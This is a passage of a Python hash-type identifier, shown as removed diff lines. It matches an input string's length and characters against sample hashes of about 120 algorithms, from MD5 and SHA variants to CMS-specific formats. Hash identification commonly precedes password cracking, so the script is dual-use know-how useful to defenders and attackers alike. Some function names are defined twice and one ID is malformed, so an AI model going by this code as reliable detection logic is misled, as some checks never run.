"120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - -# hash.islower() minusculas -# hash.isdigit() numerico -# hash.isalpha() letras -# hash.isalnum() alfanumerico - -def CRC16(hash): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") -def CRC16CCITT(hash): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") -def FCS16(hash): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - -def CRC32(hash): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") -def ADLER32(hash): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") -def CRC32B(hash): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") -def XOR32(hash): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - -def GHash323(hash): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") -def GHash325(hash): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - -def DESUnix(hash): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - -def MD5Half(hash): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") -def MD5Middle(hash): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") -def MySQL(hash): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - -def DomainCachedCredentials(hash): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") -def Haval128(hash): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") -def Haval128HMAC(hash): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") -def MD2(hash): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") -def MD2HMAC(hash): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") -def MD4(hash): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") -def MD4HMAC(hash): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") -def MD5(hash): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") -def MD5HMAC(hash): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") -def MD5HMACWordpress(hash): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") -def NTLM(hash): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") -def RAdminv2x(hash): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") -def RipeMD128(hash): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") -def RipeMD128HMAC(hash): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") -def SNEFRU128(hash): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") -def SNEFRU128HMAC(hash): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") -def Tiger128(hash): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") -def Tiger128HMAC(hash): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") -def md5passsalt(hash): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") -def md5saltmd5pass(hash): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") -def md5saltpass(hash): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") -def md5saltpasssalt(hash): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") -def md5saltpassusername(hash): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") -def md5saltmd5pass(hash): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") -def md5saltmd5passsalt(hash): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") -def md5saltmd5passsalt(hash): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") -def md5saltmd5saltpass(hash): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") -def md5saltmd5md5passsalt(hash): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") -def md5username0pass(hash): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") -def md5usernameLFpass(hash): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") -def md5usernamemd5passsalt(hash): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") -def md5md5pass(hash): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") -def md5md5passsalt(hash): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") -def md5md5passmd5salt(hash): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") -def md5md5saltpass(hash): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") -def md5md5saltmd5pass(hash): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") -def md5md5usernamepasssalt(hash): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") -def md5md5md5pass(hash): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") -def md5md5md5md5pass(hash): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") -def md5md5md5md5md5pass(hash): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") -def md5sha1pass(hash): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") -def md5sha1md5pass(hash): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") -def md5sha1md5sha1pass(hash): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") -def md5strtouppermd5pass(hash): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - -def LineageIIC4(hash): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") -def MD5phpBB3(hash): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") -def MD5Unix(hash): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") -def MD5Wordpress(hash): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - -def MD5APR(hash): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - -def Haval160(hash): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") -def Haval160HMAC(hash): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") -def MySQL5(hash): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") -def MySQL160bit(hash): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") -def RipeMD160(hash): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") -def RipeMD160HMAC(hash): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") -def SHA1(hash): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") -def SHA1HMAC(hash): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") -def SHA1MaNGOS(hash): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") -def SHA1MaNGOS2(hash): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") -def Tiger160(hash): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") -def Tiger160HMAC(hash): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") -def sha1passsalt(hash): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") -def sha1saltpass(hash): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") -def sha1saltmd5pass(hash): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") -def sha1saltmd5passsalt(hash): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") -def sha1saltsha1pass(hash): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") -def sha1saltsha1saltsha1pass(hash): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") -def sha1usernamepass(hash): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") -def sha1usernamepasssalt(hash): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") -def sha1md5pass(hash): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") -def sha1md5passsalt(hash): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") -def sha1md5sha1pass(hash): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") -def sha1sha1pass(hash): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") -def sha1sha1passsalt(hash): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") -def sha1sha1passsubstrpass03(hash): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") -def sha1sha1saltpass(hash): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") -def sha1sha1sha1pass(hash): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") -def sha1strtolowerusernamepass(hash): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - -def Haval192(hash): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") -def Haval192HMAC(hash): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") -def Tiger192(hash): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") -def Tiger192HMAC(hash): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - -def MD5passsaltjoomla1(hash): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - -def SHA1Django(hash): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - -def Haval224(hash): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") -def Haval224HMAC(hash): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") -def SHA224(hash): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") -def SHA224HMAC(hash): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - -def SHA256(hash): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") -def SHA256HMAC(hash): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") -def Haval256(hash): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") -def Haval256HMAC(hash): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") -def GOSTR341194(hash): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") -def RipeMD256(hash): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") -def RipeMD256HMAC(hash): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") -def SNEFRU256(hash): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") -def SNEFRU256HMAC(hash): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") -def SHA256md5pass(hash): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") -def SHA256sha1pass(hash): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - -def MD5passsaltjoomla2(hash): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") -def SAM(hash): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - -def SHA256Django(hash): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - -def RipeMD320(hash): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") -def RipeMD320HMAC(hash): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - -def SHA384(hash): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") -def SHA384HMAC(hash): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - -def SHA256s(hash): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - -def SHA384Django(hash): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - jerar.append("121020") - -def SHA512(hash): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") -def SHA512HMAC(hash): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") -def Whirlpool(hash): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") -def WhirlpoolHMAC(hash): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - -print(logo) -try: - first = str(argv[1]) -except: - first = None - -while True: - try: - jerar=[] - print("-"*50) - if first: - h = first - else: - h = input(" HASH: ") - - ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h) - - if len(jerar)==0: - - print("\n Not Found.") - elif len(jerar)>2: - jerar.sort() - print("\nPossible Hashs:") - print("[+] "+str(algorithms[jerar[0]])) - print("[+] "+str(algorithms[jerar[1]])) - print("\nLeast Possible Hashs:") - for a in range(int(len(jerar))-2): - print("[+] "+str(algorithms[jerar[a+2]])) - else: - jerar.sort() - print("\nPossible Hashs:") 